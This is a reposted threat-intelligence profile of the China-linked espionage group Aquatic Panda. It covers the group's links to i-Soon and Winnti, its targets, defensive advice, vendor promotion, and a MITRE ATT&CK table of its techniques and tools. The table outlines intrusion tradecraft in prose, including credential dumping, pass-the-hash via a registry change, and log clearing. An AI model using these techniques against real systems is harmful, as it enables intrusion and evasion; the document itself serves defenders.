Dark Web Profile: Aquatic Panda

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

Aquatic Panda is a suspected China-based threat group focused on intelligence gathering and industrial espionage. From around 2016 to 2023, the Chinese tech company i-Soon reportedly carried out global cyber intrusions under the direction of China’s MSS and MPS. Founded in 2010, i-Soon reportedly operated multiple attack teams targeting government agencies, dissidents, religious organizations, and news outlets worldwide, becoming a key player in China’s hacker-for-hire ecosystem. Aquatic Panda has been linked to this Chinese government contractor, i-Soon.

Who is Aquatic Panda?

Aquatic Panda is a suspected Chinese state-sponsored threat actor known for focusing on cyberespionage and intelligence operations. Believed to be operating under or in close coordination with China’s Ministry of State Security (MSS), the group has been tied to i-Soon, a Chinese technology contractor recently exposed for conducting offensive cyber activities on behalf of the government. The leak of internal i-Soon documents revealed that teams like Aquatic Panda were integral to China’s broader strategy of digital surveillance and strategic cyber operations.

This group has gone by many names across the cybersecurity landscape. Trend Micro refers to the group as Earth Lusca, while Google TAG identifies it as TAG-22. Microsoft labels it Charcoal Typhoon, and other aliases include RedHotel, BRONZE UNIVERSITY, CHROMIUM, Red Dev 10, BountyGlad, ControlX, Red Scylla, and FISHMONGER. Despite these differing designations, analysts agree on the group’s operational focus: long-term, persistent campaigns designed to harvest intelligence from carefully selected targets aligned with China’s strategic interests.

The group’s targets consistently overlap with those of Chinese national security objectives, and its campaigns often support state surveillance, influence operations, and digital repression beyond China’s borders.

Aquatic Panda employs tools that closely mirror those used by the broader Winnti Umbrella, yet it appears to operate independently from the Winnti group.

Winnti Group is a well-known Chinese state-aligned cyberespionage collective that has been active since at least 2012; thus, some reports claim a presence up to 2007.

What are Aquatic Panda’s Targets?

The Winnti Group, associated with cyberattacks against the video game and software industries, is responsible for high-profile supply-chain compromises such as those involving CCleaner, possibly ASUS LiveUpdate, and other software used as distribution channels for trojanized code. Over time, the group expanded its targeting scope to include universities, healthcare institutions, and organizations involved in political and strategic research, particularly in Hong Kong and broader East Asia.

ESET has linked Aquatic Panda to this larger Winnti ecosystem due to overlapping malware (e.g., ShadowPad, Winnti backdoor), shared infrastructure, and common operational tradecraft. In its 2020 investigation, researchers identified campaigns involving ShadowPad and skip-2.0 against universities in Hong Kong, aimed at espionage and long-term surveillance. Thus, the group is still a separate entity.

In 2022, ESET’s later report on Aquatic Panda’s 2022 campaign demonstrated a broad international reach, with confirmed compromises spanning Asia, Europe, and North America. In Asia, victims included governmental organizations in Taiwan and Thailand. A lesser-known target was compromised in Turkiye, though the sector remains unspecified. In Europe, the group targeted a Catholic organization in Hungary and a geopolitical think tank in France, indicating interest in ideological influence and policy insights.

Meanwhile, two distinct targets were identified in the United States: a Catholic charity operating globally and an NGO.

Notably, Trend Micro documented a case where the group targeted a Chinese trading company, highlighting that even domestic entities are not always exempt from surveillance, particularly when internal political or economic insights are at stake.

More recently, leaks from Chinese contractor i-Soon (安洵信息), as reported by SOCRadar and others, revealed that i-Soon played a key role in managing and supporting cyber operations for China’s Ministry of State Security (MSS). I-Soon maintained multiple offensive teams and tools aligned with known threat actors, and Aquatic Panda has been linked to i-Soon through this leaked documentation. The i-Soon leaks further validate long-suspected relationships between private Chinese tech firms and APT groups like Aquatic Panda, Winnti, and many more.

This diagram illustrates the overlapping roles of i-Soon, the Winnti Group, and Aquatic Panda. While not perfectly hierarchical in reality, it reflects how i-Soon or similar private organizations in China serves as both a malware supplier and operational hub, the Winnti Group leads prominent cybercrime campaigns and tools. Aquatic Panda operates as a specialized team, often under greater organizations’ direction. All are aligned with Chinese state interests.

In sum, Aquatic Panda’s targeting reflects a blend of traditional espionage, supply-chain manipulation, and ideological monitoring. Its ties to Winnti and i-Soon place it at the center of China’s evolving cyberespionage machinery, merging private contractor capabilities with state-directed objectives.

What are Aquatic Panda’s Techniques?

Aquatic Panda employs a set of techniques aimed at covert, long-term access to high-value targets. The group typically begins its intrusions by exploiting vulnerabilities in public-facing applications or by injecting malicious scripts into compromised websites to redirect victims.

Once inside a network, Aquatic Panda deploys modular malware, most notably ShadowPad, which includes capabilities such as keylogging, screenshot capture, and file exfiltration. These payloads are heavily obfuscated, decoded only in memory, and communicate with attacker infrastructure using encrypted or DNS-based channels, allowing the group to maintain stealth and persistence within targeted environments.

Initial Access & Exploitation

Aquatic Panda gains initial access primarily through vulnerability exploitation and watering hole attacks. Researchers documented the group exploiting vulnerabilities in public-facing applications and using malicious JavaScript injected into compromised websites to redirect victims to attacker-controlled infrastructure. ESET’s reporting also noted targeting of unpatched servers as an entry vector.

Use of ShadowPad

The group heavily relies on the ShadowPad backdoor, a modular malware platform commonly used by Chinese APT groups. According to researchers, ShadowPad allows attackers to load plug-ins for keylogging, screenshot capture, file retrieval, and other surveillance capabilities. Notably, Earth Lusca (Aquatic Panda) was the first group observed using a new version of ShadowPad’s obfuscation method in late 2020, which underwent further changes in early 2022. The malware is designed to be stealthy: it remains encrypted on disk and is only decoded directly in memory, making static detection difficult and indicating advanced operational security.

Command and Control (C2)

Aquatic Panda uses encrypted and stealthy communication channels for command-and-control. ShadowPad’s C2 mechanism includes custom domain generation algorithms (DGAs) and DNS-based communication. This approach enables persistence and flexible infrastructure rotation in case of detection or takedown efforts.

Post-Exploitation Activity

Once inside a network, the group typically deploys additional payloads and attempts to escalate privileges, though specific privilege escalation techniques were not detailed in the open-source reporting. Researchers note that backdoors such as ShadowPad are used for long-term access, indicating a focus on quiet persistence rather than rapid data exfiltration. During the university targeting campaigns documented in 2020, attackers used customized implants to maintain access over extended periods, suggesting that Aquatic Panda’s intrusions are methodically maintained.

Anti-Analysis and Obfuscation

Researchers highlight Aquatic Panda’s use of obfuscated shellcode loaders, while ShadowPad includes custom encryption algorithms to obfuscate code and payload behavior. Mandiant (in separate research) noted that decoding only occurs in memory, adding another layer of stealth that complicates forensic investigation.

Toolset & Malware

The group’s malware arsenal reflects both the custom tools used by Winnti actors and publicly available frameworks:

Aquatic Panda’s methods emphasize stealth, persistence, and operational flexibility, hallmarks of Chinese state-aligned actors. Their use of both custom and commodity tools enables rapid adaptation to different environments and defensive technologies. The latest heading provides a text list of the tools provided by MITRE.

How to Understand the Chinese Cyber Threat Network?

Is i-Soon still a threat after the leaks?

Yes—but it’s struggling. Despite public exposure in 2024, i-Soon is still officially operating, with multiple subsidiaries active as of early 2025. However, its workforce has shrunk by a third, it has accumulated over $1 million in debt, and it’s facing dozens of lawsuits. The company moved offices and has mainly gone silent, with no new visible cyber activity since early 2024. Once a key player in China’s contractor-driven cyber apparatus, i-Soon now appears sidelined, offering a rare look at how expendable these companies are, even after serving state interests.

Although i-Soon may be diminished, countless other firms like it remain ready to compete for state contracts, ensuring China’s cyber operations continue uninterrupted.

How are Winnti and Aquatic Panda related?

Winnti and Aquatic Panda are separate hacking groups but operate within the same broader Chinese cyber ecosystem. Both use shared malware platforms such as Winnti and ShadowPad, which multiple China-linked actors have widely adopted over the years. Winnti is associated with large-scale operations like supply-chain compromises and its malware toolkit. Aquatic Panda recently tends to focus on espionage against NGOs (Nongovernmental organizations), academia, and dissident targets. Although distinct, the two groups appear to function in parallel, using overlapping infrastructure and tools under direction from different Chinese state entities.

Who directs these groups?

Winnti is understood to align with the Ministry of State Security (MSS), which handles foreign intelligence and strategic espionage. On the other hand, Aquatic Panda has been linked to the Ministry of Public Security (MPS), China’s domestic security and policing authority. Both agencies contract or direct i-Soon to execute specific cyber operations, suggesting that i-Soon serves or once served as a common facilitator or outsourcing hub for multiple branches of China’s state security apparatus.

What is China’s broader cyber strategy?

China’s cyber strategy relies heavily on a hybrid model that combines:

• State agencies setting strategic priorities;
• Contractors like i-Soon are developing tools and executing attacks.
• The reuse and sharing of malware platforms across multiple groups.

This structure provides scalability, flexibility, and plausible deniability. Rather than centralizing all operations, China distributes its cyber capabilities through a network of affiliated actors sharing goals, infrastructure, and personnel.

Why does this matter geopolitically?

This model allows China to conduct widespread cyber espionage and influence operations efficiently and with a degree of separation from direct government attribution. Targets include foreign ministries, defense organizations, dissidents, universities, tech companies, and NGOs. These campaigns both collect intelligence and suppress threats to the Chinese Communist Party’s global and domestic control.

How to Defend Against Aquatic Panda?

Defending against Aquatic Panda requires a layered and proactive approach, tailored to the group’s stealthy, persistent nature and use of modular, memory-resident malware like ShadowPad. Their campaigns are often extended over months, involving stealthy data gathering, careful lateral movement, and long-term command-and-control (C2) operations, making early detection and consistent monitoring critical.

1. Securing Initial Access Points

Aquatic Panda often exploits internet-facing services and injects malicious scripts into compromised websites to redirect victims.

• Regularly patch exposed applications, including web servers, email gateways, and VPNs.
• Use web application firewalls to help block exploit attempts.
• Monitor for signs of watering hole activity, such as script injections or redirection chains from legitimate websites.

2. Detection of Fileless and Modular Malware

The group uses memory-resident malware like ShadowPad, which executes without leaving artifacts on disk.

• Deploy endpoint detection solutions that focus on behavior and memory analysis.
• Monitor using trusted binaries like rundll32, mshta, or regsvr32 executing unexpected payloads.
• Pay close attention to unusual outbound DNS or HTTP connections that may indicate encrypted command-and-control traffic.

APT campaigns typically involve consistent and low-volume outbound data transfers. Continuous monitoring of outbound network flows is crucial to detect this behavior.

3. Containing Lateral Movement and Privilege Escalation

Once inside a network, the group attempts to move laterally and maintain long-term access.

• Apply least privilege principles to user and service accounts.
• Enforce multi-factor authentication on all administrative access points.
• Segment critical systems and environments to limit pivoting opportunities.
• Audit and alert using tools like RDP, SMB, WMI, or SSH in unexpected contexts.

4. Integrating Threat Intelligence with SOCRadar

Real-time threat intelligence helps organizations anticipate and respond to new tools and infrastructure used by Aquatic Panda.

• Ingest up-to-date feeds from sources like MITRE and other open-source projects like MISP.

• Use SOCRadar to streamline data feeds into one platform:
  • Track Indicators of Compromise and threat actor infrastructure
  • Enrich detection rules with context-specific TTPs
  • Map ShadowPad infections and associated malware
  • Proactively hunt for signs of compromise within your environment.

In short, defending against Aquatic Panda means building visibility not just at the endpoint or network level, but across behaviors, outbound communications, and malware telemetry. With the right combination of patching discipline, behavioral detection, network monitoring, and threat intelligence integration, organizations can detect these slow-moving, stealth-driven threats before they achieve persistence or exfiltrate sensitive data.

How Can SOCRadar Help?

SOCRadar provides a comprehensive suite of tools that can significantly enhance an organization’s ability to detect, understand, and defend against advanced persistent threats like Aquatic Panda. Given the group’s stealthy tactics, modular malware (such as ShadowPad), and infrastructure obfuscation, real-time threat intelligence and contextual analysis are critical.

Here’s how SOCRadar can support your defense strategy:

1. Threat Intelligence Enrichment
   SOCRadar Threat Actor Intelligence continuously monitors the dark web, surface web, and deep web for Indicators of Compromise (IOCs), tools, and TTPs used by Aquatic Panda and other Chinese APTs. This includes:

• Updated threat actor profiles and malware associations (e.g., ShadowPad, Winnti tools)
• Real-time tracking of IP addresses, domains, hashes, and C2 infrastructure
• Correlation with MITRE ATT&CK techniques for detection rule enhancement

 

2. Early Warning with Attack Surface Management
   By mapping your organization’s exposed digital assets, SOCRadar Attack Surface Management helps you detect vulnerabilities before threat actors do.

• Continuous monitoring of external assets
• Alerts on exploitable misconfigurations and unpatched services
• Insights into how actors like Aquatic Panda might identify and exploit your infrastructure

3. Digital Risk Protection
   Aquatic Panda often targets NGOs, universities, and charities—sectors that can be under-resourced in cybersecurity.

• SOCRadar monitors for leaked credentials, impersonation attempts, and malicious references to your brand across underground forums and marketplaces
• Early alerts enable faster response to account takeovers or data leaks

Check out SOCRadar’s Free Edition!

In Summary

Aquatic Panda is a Chinese state-sponsored cyberespionage group that operates within a wider network of government-linked teams and private contractors. Its activities reflect China’s modern cyber strategy, where national objectives are pursued through a decentralized but coordinated system of outsourcing and tool sharing.

Rather than acting alone, Aquatic Panda is part of an ecosystem where multiple actors overlap in infrastructure, malware use, and targeting priorities. The group plays a role in campaigns focused on long-term intelligence gathering, surveillance, and strategic advantage.

The exposure of contractor i-Soon has provided rare insight into how groups like Aquatic Panda function, revealing the structure behind China’s cyber operations. Recognizing these patterns is critical to understanding not just the technical threats, but the strategic intent behind them.

MITRE ATT&CK TTPs of Aquatic Panda

Techniques Used by Aquatic Panda as provided by MITRE:

ID	Name	Use
T1087	Account Discovery	Aquatic Panda used the last command in Linux to identify recently logged-in users.
T1595.002	Active Scanning: Vulnerability Scanning	Used public DNS logging services to find servers vulnerable to Log4j (CVE-2021-44228).
T1560.001	Archive Collected Data: Archive via Utility	Compressed files and dumps with WinRAR and 7-Zip before exfiltration.
T1059.001	Command and Scripting Interpreter: PowerShell	Downloaded scripts and executed Base64 encoded commands in PowerShell.
T1059.003	Command and Scripting Interpreter: Windows Command Shell	Attempted to run Bash commands via cmd /C on Windows.
T1059.004	Command and Scripting Interpreter: Unix Shell	Used malicious shell scripts post-SSH access to install Linux versions of Winnti.
T1543.003	Create or Modify System Process: Windows Service	Created Windows services mimicking legitimate ones for persistence.
T1005	Data from Local System	Captured Windows security logs using wevtutil.
T1574.001	Hijack Execution Flow: DLL Search Order Hijacking	Used search-order hijacking to load malicious files and DLLs into trusted processes.
T1574.006	Hijack Execution Flow: Dynamic Linker Hijacking	Modified ld.so preload in Linux for Winnti persistence.
T1562.001	Impair Defenses: Disable or Modify Tools	Attempted to disable EDR tools.
T1070.001	Indicator Removal: Clear Windows Event Logs	Cleared Windows Event Logs to evade detection.
T1070.003	Indicator Removal: Clear Command History	Cleared shell command history in Linux.
T1070.004	Indicator Removal: File Deletion	Deleted malware from compromised hosts.
T1105	Ingress Tool Transfer	Downloaded malware onto compromised systems.
T1654	Log Enumeration	Enumerated authentication logs before selective deletion for evasion.
T1036.004	Masquerading: Masquerade Task or Service	Created services like “Windows User Service” to blend in.
T1036.005	Masquerading: Match Legitimate Name or Location	Renamed or relocated binaries to evade detection.
T1112	Modify Registry	Enabled RestrictedAdmin mode for pass-the-hash via RDP.
T1027.010	Obfuscated Files or Information: Command Obfuscation	Encoded PowerShell commands in Base64.
T1588.001	Obtain Capabilities: Malware	Acquired and used njRAT.
T1588.002	Obtain Capabilities: Tool	Acquired and used Cobalt Strike.
T1003.001	OS Credential Dumping: LSASS Memory	Attempted credential theft from LSASS memory.
T1021	Remote Services	Used remote scheduled tasks to deploy malware.
T1021.001	Remote Services: Remote Desktop Protocol	Moved laterally via RDP using stolen credentials.
T1021.002	Remote Services: SMB/Windows Admin Shares	Enabled lateral movement using admin shares.
T1021.004	Remote Services: SSH	Used SSH with stolen credentials for lateral movement.
T1518.001	Software Discovery: Security Software Discovery	Searched for third-party EDR software.
T1218.011	System Binary Proxy Execution: Rundll32	Used rundll32.exe to execute a malicious keylogger DLL.
T1082	System Information Discovery	Ran native OS commands to assess privileges and system info.
T1033	System Owner/User Discovery	Collected info on logged-in users.
T1007	System Service Discovery	Searched for services related to EDR.
T1550.002	Use Alternate Authentication Material: Pass the Hash	Modified registry for RestrictedAdmin, enabling hash-based RDP login.
T1078.002	Valid Accounts: Domain Accounts	Gathered valid domain credentials for lateral movement.
T1047	Windows Management Instrumentation	Used WMI for lateral movement.

Software Used by Aquatic Panda as provided by MITRE:

ID	Name	Use
S0154	Cobalt Strike	Used for multiple techniques, including PowerShell execution, service creation, credential dumping, masquerading, lateral movement (RDP/SMB/SSH), and evasion.
S0385	njRAT	Used for PowerShell commands, keylogging, RDP access, credential theft, file deletion, and exfiltration.
S0596	ShadowPad	Used as a remote access tool leveraging DGA, DNS protocols, and obfuscation methods.
S0645	Wevtutil	Used to extract and clear Windows event logs.
S0430	Winnti for Linux	Deployed in Linux environments for encrypted C2, rootkit functions, and fileless storage.
S0141	Winnti for Windows	Used for persistence, credential access, and encrypted communication, along with masquerading and registry manipulation.

Article Link: https://socradar.io/dark-web-profile-aquatic-panda/